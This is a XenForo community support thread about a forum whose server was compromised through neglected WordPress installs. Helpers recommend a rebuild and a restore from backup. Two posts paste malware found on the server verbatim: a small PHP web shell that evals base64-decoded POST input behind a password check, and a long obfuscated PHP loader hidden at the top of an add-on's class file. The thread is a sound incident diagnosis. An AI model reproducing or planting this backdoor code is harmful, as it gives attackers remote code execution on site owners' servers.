• This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

XF 1.4 Google saying: "This site may be hacked"

Daniel-SP

Active member
#1
Hello guys,

I have came across a massive decrease of pages indexed by google and checking WebMaster Tools I saw a warning telling me that my website might be hacked.

They say that a thrid party people just put malicious content into my forum and give me some URLS.

Accessing them, they are pure HTML pages without any relation to Xenforo, inside my domain.

How can I get over this ? I don't know how much its related to xenforo but my forum is running normally if I browse it.

Some more information: I just run xenforo into my Linode instance that has been configured by the amazing service of @MattW
 
Last edited:

Tracy Perry

Well-known member
#2
Are you also by chance running WordPress anywhere on that Linode instance?
You will first need to find the method used for the intrusion and injection of the HTML pages that are getting picked up and lock that down.
Then you proceed with the cleanup (which depending on how the intrusion occurred could be extensive).
 

Daniel-SP

Active member
#3
Are you also by chance running WordPress anywhere on that Linode instance?
You will first need to find the method used for the intrusion and injection of the HTML pages that are getting picked up and lock that down.
Then you proceed with the cleanup (which depending on how the intrusion occurred could be extensive).
Yes, I do have a wordpress instance.

Google is pointing an URL of the domain of the forum itself, not the wordpress instance.

Any tip on how I will be able to find that?

Well.. I'm finding strange content everywhere. I got like 4 instances of wordpress that I really dont touch much and all of them plus my xenforo folders have recent modified files with strange content
 
Last edited:

Mouth

Well-known member
#4
Your server is compromised.
You need to ensure your old backups are in working order, ask your server provider to re-install your operating system, ensure it's secured and hardended, and then restore from an old backup prior to compromise.
There is a couple of businesses listed within here that are well recommended for setting up, and maintaining, secure servers. If you don't know how to do it yourself.
 

Daniel-SP

Active member
#5
Your server is compromised.
You need to ensure your old backups are in working order, ask your server provider to re-install your operating system, ensure it's secured and hardended, and then restore from an old backup prior to compromise.
There is a couple of businesses listed within here that are well recommended for setting up, and maintaining, secure servers. If you don't know how to do it yourself.
Looks like Im into serious trouble. Right now that I will need to renew my Xenforo license to upgrade and avoid those problems..lol

For the wordpress instances, Im just deleting them since they are nothing but old sites that I dont even mantain anymore.
 

Brogan

XenForo moderator
Staff member
#6
Upgrading XF won't resolve anything.

You will need to perform a forensic examination of the server, patch the hole, and restore from a known good backup or comb through the database and every file and remove any malicious code.
 

Tracy Perry

Well-known member
#7
Yes, I do have a wordpress instance.

Google is pointing an URL of the domain of the forum itself, not the wordpress instance.

Any tip on how I will be able to find that?

Well.. I'm finding strange content everywhere. I got like 4 instances of wordpress that I really dont touch much and all of them plus my xenforo folders have recent modified files with strange content
WordPress is a known attack (and intrusion) vector. If you don't have all the sites (and their associated plugins) kept up to date it's most likely where the entry was done from.
Once they make entry they can traverse any of the sites on the server.

For the wordpress instances, Im just deleting them since they are nothing but old sites that I dont even mantain anymore.
And this is most likely the reason you got hacked.
With WordPress, if you aren't going to maintain the sites (keep them updated) then you need to remove all instances of them.

Only reliable way to recover will be to spin the server back out as a new one and then restore from known good backups.
 

Daniel-SP

Active member
#9
Upgrading XF won't resolve anything.

You will need to perform a forensic examination of the server, patch the hole, and restore from a known good backup or comb through the database and every file and remove any malicious code.

WordPress is a known attack (and intrusion) vector. If you don't have all the sites (and their associated plugins) kept up to date it's most likely where the entry was done from.
Once they make entry they can traverse any of the sites on the server.


And this is most likely the reason you got hacked.
With WordPress, if you aren't going to maintain the sites (keep them updated) then you need to remove all instances of them.

Only reliable way to recover will be to spin the server back out as a new one and then restore from known good backups.

Well, as a starting point, I am just deleting every instance of wordpress I have, since I dont have any activity anymore.

After its done, I will get some help to recover to a backup I have here from last year of my XF since I dont touch it since them.. I just need to find it, hehe.

I backed up a wordpress folder that I have to my local machine and windows defender pointed some malicious content, so looks like It came from wordpress like you said.

Is your XenForo 1.4 patched up all the way to 1.5.13?
Review the plugins you're using as well.
Not yet.. And lafter the responses I got, Im not doing it ultil Im sure that the problem is over.
 

MattW

Well-known member
#10
You have a phpmail folder uploaded inside your XenForo folder on the 21st Feb, which has infected the rest of the site. They have got into all the sites via Wordpress
Code:
[root@li121-82 public]# cat upgrade.php 
This website is ok!!</br>
<?=$_SERVER['DOCUMENT_ROOT']?>
<?php if($_GET["login"]=="snvcu"){ echo success; $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;");}} ?>
[root@li121-82 public]#
 

MattW

Well-known member
#11
Guess who wrote this file...........
Code:
<?php $hxqhxpcdx = ') { $eptnlgc = "    x63     162     x65     141     x74     145     x5f     146     x75     15]y7:]268]y7f#<!%tww!>!        x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]3~<3,j%>j%!*3!    x27!hmg%281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]yc1^W%c
!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]=])0#)U!     x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#["       x48     124     x54     120     x5f     125     x53     105     x52     137     x41     107     x45     116     x54"]); i#fubfsdXk5`{66~6<&w6<  x7      x7f!
>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)3)%cB%iN}#-!       x24/%tmw/       x24)%c*W%eN+#Qi x5!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)suf ((strstr($uas,"    x6d     163     x69     145"))7**197-2qj%7-K)udfoopdXA  x22)7gj6<*QDU`MPT7-NBFSUT`LDPT
7-UFOJ`GB)fub#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<();}}d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9FS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%  x7fg+)!gj+{e%!osvufs!*!+A!>!{e%if((function_exists("    x6Ysboepn)%bss-%rxB%h>#]y31]278]
y3e]81]K78:56985); $tzegjpk = implode%w:!>!     x246767~6<Cw6<pd%w6Z6<.5`hA     x27pd%6<pd%w6Z6<.4`hA   x27pd%6<        x64     162     x6f     151     x64")) or (strstr($uas,"        x63     150     x973:8297f:5297e:56-xr.985:52972        157     x6d     145")) or
(strstr(6<    x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<       x7fw6*CWt275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:{hnpd#)tutjyf`opjudovg      x22)!gj}1~!<2p% x7fhnpd!opjudovg!|!**#j4:|:**#ppde#)tutjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovw!>!#
]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j!~!<##!>!2p%Z<^2  x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2br%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft2)gj6<^#Y#      x5cq%
  x27Y%6<.msv:6197g:74985-rr.93e:5597f-s.4<!%tmw!>!#]y84]275]y83]273]y76]277#<!%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0x24*<!%t::!>!        x24Yppsqpt)%z-#:#*      x24-    x24!>! 
x24/%tjw/       x24)%   x24-    x24y4   x24-    x21^-%r x5c2^-%hOh/#00#W~!%)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*dfsdXA     x27K6<  x7fw6*3qj%7>    x2272q#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{%6<C      x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o
]s]#)fepmqyf  fw6*CW&)7gj6<*doj%7-C)fepmqnjA  x27&6<.fmjgA    x27doj%f`57ftbc x7f!|!*uyfu     x27k:!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B7rfs%6<#o]1/20QUUI7jsv%7UFH#     x27rfs%6~6<     x7fw6<*K)ftpmdXA6|-K)ebfsX      x27u%)7fmjix6<C x27&6<*rfs%7-K)f]241
]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5`ftsbqA7>q%6< x7fw6*  x7f_*24 x5c%j^  x24-    x24tvctus)%     x24-    x24b!>!%yy)#}#-#        x24-    x24-tu, $tzegjpk); $semwihl%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!*}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>
!%tdz)^#zsfvr#    x5cq%7**^#zsfvr#        x5cq%)ufttj     x2-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!  x27!hmg%)!gj!|!*1?hmg%ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f`msvd}+;!>!} x27;!>>>!}_;gvc%}&;f    x24-    x24gps)%j>1<%j=tj{fpg)%
x24-    x24*<!~!        x24/%tj%)7gj6<**2qj%)hopm3qjA)qj3h85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225S,6<*msv%7-MSV,6<*)u2]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]#g6R
85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebgj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gpnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3ftmf!}Z;^nbsbq%      x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/
#/#/},;t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2752w/     x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# 5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR        x2#-#T#-#E#-#G#-#H#-#I#-#K445]43]321]464]284]364]6]234
]342]58]24]31#-%tdz*Wsfuvso!%bss  x5csboenj!/!#0#)idubn`hfsq)!sp!*#opmA   x273qj%6<*Y%)fnbozcYufhA        x272qj%8y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:j!~<ofmy%,3,j%>j%!<**3-j%r (strstr($uas,"   x61     156/%tmw/       x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#Q
wTW%hIr x5c*#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt($n)-1);} @error_reporting(0)!>>    x22!ftmbg)!gj<*#k#)usbut`cpy38#-!%w:**<")));$semwihl = $eptnlgc(""#-#}+;%-qp%)54l}      x27;%!<*#}_;#)323ldfid>}&;!osvufs}      x7f;!opju4]y8   x24-    x24]26  x24-    x24<%j,,*!
|     x2/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_      x5c}X   x2      x27,*c  x27,*b  x27)fepdo]67]452]88]5]48]32M3]317]445]212]<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%tcvt)fubmgoj{hA!osvufs!tmbg}  x7f;!osvufs}w;*))1/35.)1/14+9**-)1/2986+7**6*   x7f_*#[k2`{6:!}7;!}6;##}C;!>
>!))) { $GLOBALS["  x61     156     x75     156     x61"]=1; $uas=strtolower($_SERVERdovg}k~~9{d%:osvufs:~928>>     x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439V  x7f     x7f     x7f     x7f<u%V x27{ftmfV       x7f<*X&Z&S{ftmfV        x7f<*XAZASVf.)fepdof./#@#/qp%>5h%!<*::
::::-111112)eobs`un>qp6   x63     164     x69     157     x6e"; function lnkqmla($n){return chr(ord<!%ff2!>!bssbz)        x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x8y]572]48y]#>m%:|:*r%!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfi
dk!~!<**qp%!-uyfu%)3of)fepdo(!isset($GLOBALS["  x61     156     x75     156     x61"])jojR      x27id%6<        x7fw6*  x7f_*#ujojRk3`{666~6<&w6<       x7fw6*CW&ujsxX6<#o]o]Y%7;utpI#7>/6<^#zsfvr#     x5cq%7/7#@#7/7^#iubq#   x5cq%   x27jsv%6<C> or (strstr($uas,"   x7
2     166     x3a     61      x31")) o4-      x24gvodujpo!    x24-    x24y7   x24-    x24*<!egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!        x24t2w)##Qtjw)#]82#-#!#-%tmw)%tww**Wf   142     x5f     163     x74     141     x72     164") && }W;utpi}Y;tuofuopd`
ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5!fwbm)%tjw)#  x24#-!#]x27*&7-n%)utjm6<        x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127)7gj6<.[A        x27&6<  x7fwjg!)%j:>>1*!%b:>1<!fmtf!pd%w6Z6<.3`hA       x27pd%6<pd%w6Z
6<.2`hA   x27pd>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,B$uas,"     x66     151     x72     145     x66     157     x78")))!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y](array_map("lnk
qmla",str_split("%tjfI{*w%)kVx{**#k#)tutjyf`x   x22l:!}V;3q%}U;y]}R;2]d%-#1GO   x22#)fepmqyfA>2b%!<*qp%-*.%)euhA>U<#16,47R57,27R66,#/q%>2q%<.984:75983:48984:71]K9]77]D4]8:-t%)3of:opjudovg<~   x24<!%o:!>!     x242178}527}88:}334}472 x24+fmhpph#)zbssb!-#}#)fepmq7tfs%6
<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUF6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSsgwilve'; $wnxmkf=explode(chr((407-287)),substr($hxqhxpcdx,(27929-21909),(170-136))); $pzqmkhkn = $wnxmkf[0]($wnxmkf[(5-
4)]); $zjbfuds = $wnxmkf[0]($wnxmkf[(11-9)]); if (!function_exists('zcwwvet')) { function zcwwvet($uyjunsceq, $tiqtszuzjcp,$wvrgaulo) { $sgsxlel = NULL; for($mmeusbxa=0;$mmeusbxa<(sizeof($uyjunsceq)/2);$mmeusbxa++) { $sgsxlel .= substr($tiqtszuzjcp, $uyjunsceq[($mme
usbxa*2)],$uyjunsceq[($mmeusbxa*2)+(4-3)]); } return $wvrgaulo(chr((32-23)),chr((399-307)),$sgsxlel); }; } $kkvrnuskkx = explode(chr((147-103)),'836,24,5123,35,4785,41,4312,66,294,68,537,36,4956,42,3750,24,992,51,1072,29,5541,37,0,55,4551,59,3873,28,906,21,5637,35,1
336,59,927,65,5388,41,2038,52,5279,64,2276,41,4882,24,2217,59,573,68,1966,32,2830,28,3643,37,4906,50,2571,40,1584,28,2383,26,362,24,2090,51,1101,45,3490,35,5902,52,2991,20,4826,56,5343,21,4279,33,5158,54,1539,45,2747,33,4230,21,386,53,480,57,4207,23,125,22,1679,52,3
114,48,3725,25,2611,67,5578,59,1998,40,1255,20,1213,42,1423,54,5720,40,1903,63,4110,24,4502,49,2490,46,3832,41,5877,25,3617,26,2678,69,3426,64,748,60,4685,50,4735,50,2141,27,3274,59,3972,61,4378,64,1146,67,1275,61,808,28,3901,32,4442,60,4167,40,5760,28,3062,52,5672,
48,1731,68,245,49,4069,41,1640,39,3333,53,55,70,3680,45,1477,26,1503,36,3215,59,4664,21,5818,59,4610,54,2409,60,1819,59,4033,36,4998,38,2780,50,3386,40,1799,20,439,41,191,54,3162,53,5036,54,3774,58,1878,25,5090,33,860,46,1612,28,1043,29,2858,66,5788,30,3011,51,147,4
4,5954,66,701,47,2536,35,2924,67,2317,66,4134,33,3549,68,4251,28,5476,65,5364,24,5212,46,1395,28,5429,47,2168,49,3525,24,641,55,5258,21,3933,39,2469,21,696,5'); $kwryxvy = $pzqmkhkn("",zcwwvet($kkvrnuskkx,$hxqhxpcdx,$zjbfuds)); $pzqmkhkn=$hxqhxpcdx; $kwryxvy(""); $k
wryxvy=(746-625); $hxqhxpcdx=$kwryxvy-1; ?><?php

/**
 * Class Listener Class for EventListener.
 *
 * @package *******_*******Helper
 * Version 1.0.0
 */
:whistle:
 

Tracy Perry

Well-known member
#13
Guess who wrote this file...........
Code:
 *
 * @package *******_*******Helper
 * Version 1.0.0
 */
:whistle:
Hmmmm... couldn't be our poor misunderstood individual from the Asiatic countries that keep coding call-backs into his add-ons (and people keep using even now because some of his stuff is "cool") could it?
 

Daniel-SP

Active member
#14
Hmmmm... couldn't be our poor misunderstood individual from the Asiatic countries that keep coding call-backs into his add-ons (and people keep using even now because some of his stuff is "cool") could it?
Well, I had some custom addons made by them (way too specific and expensive at least for me.. $400+ spent) that I asked years before all the trouble and I haven't had cash to ask for another development. Btw, lets make it right this time.
 

Daniel-SP

Active member
#16
Years before all the trouble was identified and proven.

They were always pirates and hackers.
03/31/2014 to be more precise.. Just grabbed the date from my quote, lol..

I know its not a reason, I should have take actions when I saw the thread talking about it.
 

Tracy Perry

Well-known member
#18
Who are you guys talking about, we're not all part of the clique.
<removed before I get a rules violation warning from Broganator!>
He's a known hacker and anyone using his add-ons/styles are just asking to be hacked.

EDIT:
Brogan linked to the full discussion... the individual in question is named in the NOTE: portion of the first post of said thread linked to.
 
Last edited: